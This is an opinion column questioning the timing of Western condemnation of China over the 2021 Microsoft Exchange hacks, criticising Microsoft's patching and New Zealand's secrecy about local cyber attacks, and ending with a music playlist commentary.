The timing was one of the weirder aspects of this week’s cyber condemnation of China by the West. Why was this piece of
political theatre being staged now? China (and Russia’s) sponsoring and/or condoning of semi-state and criminal hacker
groups has been known about for nigh on a decade. More particularly, Microsoft had been alerted to the flaws in its
Microsoft Exchange product in early January, and had (belatedly) issued patches to correct those flaws in early March.
At that time, the company admitted that the four major flaws in Microsoft Exchange had been penetrated by a group of
Chinese hackers that Microsoft called Hafnium. It blamed the Chinese government
for harbouring the group. (Hafnium is the same state-sponsored group that Canada and New Zealand have called APT 40.
APT stands for Advanced Persistent Threat.)
So why did the US, the UK, the EU, Australia, Japan etc etc take until July 20 to tell the world that Chinese hackers
have exploited flaws in Microsoft Exchange and that this sort of behaviour must stop, or else? What interests of
political theatre are being served by making a song and dance now – over three months after White House officials had publicly chided Microsoft,
and told the company that issuing inadequate security patches for Microsoft Exchange was not a good enough response to
the failings in its product?
In New Zealand’s case, how could it be that the (paywalled) Australian newspaper was able to tell its readers that New Zealand and Canada were about to condemn China’s complicity in the Microsoft hack
, before GCSB Minister Andrew Little informed New Zealanders late on Monday night? On Monday, the Crikey website cited
the Australian story to the same effect that negative comment from New Zealand and Canada about China would be forthcoming. While the
commentariat pondered whether New Zealand should be applauded or criticised for daring to criticise China, a raft of
other questions went unanswered.
Such as: what responsibility does a lucrative tech giant like Microsoft bear for (a) having readily exploitable flaws in
Microsoft Exchange and (b) taking its own sweet time to alert its customers of the problems and provide them with
security patches that still (see below) seem to have left a ‘back door’ open? Unfortunately, Bill Gates didn’t get to
where is today by making the quality of Microsoft’s products an overriding concern. Beyond Microsoft, what
oversight/testing capability do (or should) security agencies have for vetting digital products that can compromise the
privacy and data of individuals and firms? The banking system requires certain stewardship standards from those
entrusted with caring for the public’s wealth. No similar standards seem to apply to the highly profitable companies
entrusted with caring for the public’s digital data.
In the US, the FBI obtained a court order in March
to enter the networks of businesses to remove web shells used by cyber attackers as ‘ back doors’ to exploit the
vulnerabilities in Microsoft Exchange. In lieu of adequate corporate responsibility, is this kind of exercise of state
power a good idea, or a bad idea?
The state may need to get more involved. The unfortunate reality is that almost all the recent major hacks have been
discovered by individuals or by private players, such as the FireEye security firm that discovered the SolarWinds hack
last December. As things stand, we seem to be relying on the private sector and on computer nerds to check and report on
the adequacy of the tools we use to carry our digital data. At the very least, it should be made mandatory for the
companies selling these systems to report the vulnerabilities in their products immediately on discovery. Ironically,
Microsoft and the FireEye security firm are both currently lobbying Congress
to make breach reporting mandatory. That legal requirement isn’t currently in place. Tech companies can limit breach
disclosures to protect their share price.
Looking ahead, would it be better - or worse - to call in the FBI (or the GCSB and SIS)when product failings become
apparent, and when vital socio-economic organisations are being attacked for reasons of ransom, IP theft or
cyberespionage? Either way, this is not a great situation. With reason, some people may not want to have the SIS to be
in a position where it could trawl through their health data, even while acting as a line of privacy defence.Actual risk, appropriate response
Why, one wonders, are the attacks on Microsoft by Chinese operatives being treated by the West as so much worse than the
SolarWinds hack detected in December, a raid widely attributed to Russian-based operatives? In the SolarWinds hack –
also made possible by flaws in the company’s products – it is believed the Russian hackers went for nine months
undetected, while they ransacked files held by the US Treasury, Justice etc and some 18,000 other government agencies
and private firms. That attack too, was preceded by any number of Russian attacks on everything from the IOC to the
integrity of elections in the US and France. If hacking was an Olympic sport, Russia and China would both be medal contenders.
So…why has the Western club of nations decided that now is the right time to join together to condemn China, when it
hasn’t rallied the same team effort to blame Russia for its (equally or more damaging) persistent online behaviours? It
looks very much as if New Zealand has been wrangled into joining the chorus line in a White House-led effort intended to
put China (and the world) on notice that the US is back, and in charge of Team West. Basically, we have been pressured
into putting our trade and diplomatic relationship with China in jeopardy, in the service of what is largely an exercise
in image building by US President Joe Biden. This week, there hasn’t been any evidence of New Zealand having an
“independent” foreign policy. Or much sign of our fabled ability to juggle our trade links with China, and our defence
and security links with the Americans. Plainly, under Biden, the space for that kind of fancy footwork is going to
shrink.Here, at Home
The cyber security questions don’t stop there. Apparently, we are regularly coming under cyber-attack by hackers
sponsored by or operating with the tacit blessing of several other nation states, including the hacker groups acting on
behalf of our main trading partner. If that’s the case, why aren’t we being told which countries are believed to have
been responsible for the major hacks and ransomware demands that have happened here, of late?
For example: the public has been left in the dark as to the likely national origins of the hackers who committed the
cyber-attacks on (a) the NZ stock exchange in mid 2020 and (b) the Waikato DHB this year. Moreover, we aren’t being told
if these attacks are being launched by foreign criminal gangs or by foreign state agencies, or by individuals with a
foot in both camps. Do our security agencies even know such details? It would help public confidence to know how well
our cyber defenders are coping with the traffic.
Rumour has it that in both those major NZ hacks, Russian-speaking criminal gangs working with the blessing of the
Russian government were responsible. It would still be nice though, to be officially told who our security agencies
regard as the prime suspects. Instead, we’re being rallied by the Ardern government to the threat posed by China even
though we haven’t been offered any evidence as to which New Zealand individuals, firms or state agencies (if any) have
suffered actual harm at the hands of these Chinese APT groups.
The question is not merely why we’re marching in step with our traditional allies to name and shame China on the world
stage. To repeat : GCSB Minister Andrew Little has refused to name even the country of origin of the hackers at the
Waikato DHB or any of the local victims of the multitude of hacks earlier this year of Microsoft Exchange. His answer
this week has been that there are issues of national security and “commercial in confidence reasons” that prevent him
from commenting further on such matters. Really? This is one area where the public’s right to know who has been
violating their privacy and/or stealing their data is more important than the possibility that some commercial firms
might lose market share (or some state agencies might lose face) if their inability to protect the public’s data was to
be disclosed. Most people would blame Microsoft, not their hapless local customers.
Thank goodness that during the Vietnam War, similar issues of “commercial in confidence” sensitivity didn’t prevent us
from finding out that Dow Chemical were making Agent Orange in New Plymouth. In a transparency sense at least, those
were the good old days.Hafnium, APT 40
The first public sign of the vulnerabilities in Microsoft Exchange were reported to the company (and to the world at
large) on January 5th in this tweet
by a DEVCORE researcher using the handle “Orange Tsai.” Initially it was thought that attacks exploiting the four “zero
day” flaws detected began on January 6th. The Volexity site has since reported
that those attacks began three days earlier, on January 3.
For background: Microsoft Exchange Server is an email inbox, calendar, and collaboration solution. Users range from
giant multinationals to small and medium-sized businesses worldwide. The extent of the problems resulting to users of
the flawed versions of Microsoft Exchange have depended on the adequacy of the security patches and the speed at which
they are made available by Microsoft, and put in place by users. ZDNet has explained her
e the four basic flaws, the kind of attacks mounted on them, and the response by Microsoft. The subsequent
investigations have included the possibility that the attackers were tipped off by an insider :
Microsoft is now also reportedly investigating potential links
between PoC attack code issued privately to cybersecurity partners and vendors prior to patch release and exploit tools
spotted in the wild, as well as the prospect of an accidental -- or deliberate -- leak that prompted a spike in attacks.
If used in an attack chain, all of the four main vulnerabilities cited could lead to “Remote Code Execution (RCE),
server hijacking, backdoors, data theft, and potentially further malware deployment….”As mentioned, Microsoft has blamed
a Chinese state sponsored group it calls Hafnium for the subsequent attacks. There is useful background information on Hafnium here
. Here’s how the attackers did it :
The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by
using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would
create what’s called a web shell to control the compromised server remotely. Third, it would use that remote access –
run from the U.S.-based private servers – to steal data from an organization’s network.
To an outsider, that last point that the Chinese hackers (and presumably those sponsored by other nation states) are
launching their attacks via a web of virtual private servers located in the US (partly in order to conceal their true
location) seems a bit surprising, and ironic. It suggests a possible means of defence. Namely, don’t lease US servers to
Chinese, Russian or North Korean based enemies of the state, or their representatives. This is maybe where the FBI could
be of some use, in tracing who hired those servers, and from where.Was China the sole player?
Even when it comes down to just the cyber attacks made via Microsoft Exchange, its doubtful that Hafnium (aka APT 40)
were the only culprits. Microsoft’s own alerts accessible here
explicitly say others were involved:
[03/08/2021]: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with
on-premises Exchange Server….
Update [03/05/2021]: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious
actors beyond HAFNIUM.
Who were these other players ? ZDNet’s chronology of how the crisis developed in early March shows how quickly it became open
season on Microsoft Exchange. Even so, several of the other identified attackers also seem to have been
Chinese-speaking. They included the notorious APT 27 group, also known as LuckyMouse, which has a history of cyber
breaches stretching back to 2010. This year, it made successful inroads into several US gaming companies
. Calypso, one of the other hacker groups involved, is a cyber-espionage group that Russian sources say has “Asian roots.”
Winnti Group, another team named as being involved, is also Chinese-based. Reportedly,
while LuckyMouse has tended to specialise in cyber-espionage,Winnti Group tends to be a for-profit operation
The US Cybersecurity and Infrastructure Security Agency (CISA) says that it is "aware of threat actors using open source
tools to search for vulnerable Microsoft Exchange Servers." On March 10, ESET said that 10 APT groups
have been connected to attacks exploiting the Exchange Server vulnerabilities. These state-sponsored groups include
LuckyMouse, Tick, Winnti Group, and Calypso. F-Secure researchers have called the situation
a "disaster in the making," adding that servers are "being hacked faster than we can count."
The slew of attacks in March via Microsoft Exchange mushroomed :
Mandiant says further attacks against US targets
include local government bodies, a university, an engineering company, and retailers. The cyberforensics firm believes
the vulnerabilities could be used for the purposes of ransomware deployment and data theft. Sources have told
cybersecurity expert Brian Krebs that at least 30,000 organizations
in the US have been hacked. Bloomberg estimates put this figure closer to 60,000
as of March 8. Palo Alto Networks suggests there were at least 125,000 unpatched servers
worldwide, as of March 9.
Things quickly got worse:
On March 11, Check Point Research said that attack attempts leveraging the vulnerabilities were doubling every few hours
. On March 15, CPR said attack attempts increased 10 times based on data collected between March 11 and March 15. The
US, Germany, and the UK are now the most targeted countries. Government and military targets accounted for 23% of all
exploit attempts, followed by manufacturing, financial services, and software vendors. The US Cybersecurity and
Infrastructure Security Agency (CISA) says that it is "aware of threat actors using open source tools to search for
vulnerable Microsoft Exchange Servers."
As mentioned, some of the APT groups cited above had previously been associated with intrusions conducted mainly for
reasons of cyberespionage or IP theft, and not ransomware attacks for profit.. However, this pattern seems to be changing
, as state actors and criminal gangs appear to be co-operating in launching ransomware demands, and are sharing their tools of attack
to do so. Reportedly, they may also be splitting the proceeds. The tools of the trade include
these items :
In a situation reminiscent of the 2017 WannaCry ransomware outbreak, on March 12, Microsoft said
that a variant of ransomware known as DoejoCrypt/DearCry is leveraging the bugs to deploy ransomware on vulnerable
Exchange servers…The deployment of web shells, such as China Chopper
, on compromised Exchange servers has proved to be a common attack vector
. Batch files written to servers infected with ransomware may ensure access is maintained to vulnerable systems, even
after infections have been detected and removed.
China Chopper is a tiny but crucial part of the APT arsenal when it comes to creating enduring “ back doors” to online
targets. FireEye’s useful brief description of China Chopper is available here.
ZDNet has also explained the qualities of China Choppe
r that make it such a useful “back door” instrument.
Finally….all the above information is being freely published and debated elsewhere. It is time the NZ government and its
security agencies were more forthcoming about the cyber attacks on our firms and state agencies. Our security agencies
were supposed to be entering a new era of transparency, and have recently been engaged in re-branding exercises to that
effect. Yet when it comes to cyber security, they’re ducking back into the worst “zipped lips, we know best” practices
of yore. These come down to “trust us, we’re the experts and we know what we’re doing” approach. It has never seemed to
occur to the SIS and the GCSB that the public’s trust is not a given, but something that has to be earned. Right now,
cyber security isn’t a field where the state “experts” hold all the cards, or even many of the relevant ones.
Special Footnote : The above article refers to 18,000 customers affected by the SolarWinds hack. However, a SolarWinds company
representative has since been in contact and referred me to an official investigatio
n. Here’s the key paragraph:
“….of the approximately 18,000 affected public and private sector customers of Solar Winds’ Orion product, a much
smaller number have been compromised by follow-on activity on their systems. We have so far identified fewer than ten
U.S. government agencies that fall into this category, and are working to identify and notify the non-government
entities who also may be impacted.
Clearly there’s a spectrum involved here, ranging from “affected” to being“compromised by follow-on activity.” While 250
US agencies and entities were originally reported as “affected” by the hack, the reference to “fewer than ten US
government agencies” being subject to “follow-on activity” is a bit disingenuous, given the importance of some of those
agencies: Justice, Energy, Homeland Security, Commerce and the State Department.
Footnote One : Mindful of what happened subsequently at Waikato DHB, the trend of targeting healthcare providers had been identified by Microsoft
, last October. The spread of cyber attacks to US hospitals is also discussed by NBC news here
Footnote Two : The term “cybersecurity” conjures up images of ninja attacks by elite Asian hackers and Russian SMERSH agents out to (a)
steal the intellectual property of our corporates, and (b) disrupt the key strategies of our politicians and diplomats.
Not to mention the theft and extortion rackets being run by criminal gangs whose names seem torn from the pages of a
James Bond novel.
For sure, there are some bad players out there in cyberspace. Yet cyber-security also seems to consist of democratic
governments building and deploying platforms for pro-active cyber offensives aimed at alien foreign powers, and even (when it comes down to stealing trade secrets) some that have
aimed in the past at a few of our friends and allies. What I’m getting at is that cybersecurity is not just about
building up our resilience/resistance capabilities on the home front. Last year, the Australians were upfront about what they have in mind -
Australia will recruit 500 cyber spies and build on its offensive capabilities to take the online fight overseas in a
$1.3 billion funding boost……The Australian Signals Directorate will also share intelligence with government departments
and companies in near real time as part of the biggest ever cash injection to Australia's cyber defences. Prime Minister
Scott Morrison [announced] the ASD will be given more than $1 billion over the next decade to disrupt foreign cyber
criminals and better identify malicious hacks.
Hmm. So… Australia aims to “build on its offensive capabilities to take the online fight overseas.” Clearly, in the age
of cyber conflict, hack attacks are just another form of force projection. And “our side” is doing it, too
This week’s Spotify playlist kicks off with a track from the Superwolves collaboration between Will Oldham and Matt Sweeney, and they’re backed on this cut by the great Sahel region guitarist
Mdou Moctar, and his band. The hybrid result sounds like West African rockabilly. That’s why I’ve segued into the
classic “Obaa Sima” dance cut from Ghana There’s a fascinating documentary available here on Youtube
about how this terrific piece of music was recorded, buried, re-discovered and has since spread around the world, much
to the amazement of the humble “Ata Kak”guy who made it.
Everything else is pretty self-explanatory. Desperate Journalist are a four piece British band, - two women, two blokes
- based in London. The playlist’s closing cut “Banks of the Hope” is not just an optimistic metaphor, though it is that,
too. The Hope River runs through the St Andrew parish of Kingston, Jamaica. You should check out this beautiful video
featuring Agent Sasco – who grew up on the river- side – as he stands on the bridge that links his old neighbourhood of
Kintyre (in St Andrew parish) to the rest of the world. That line about wanting “better public transport” is only part
of what the community needs.
Here’s the playlist :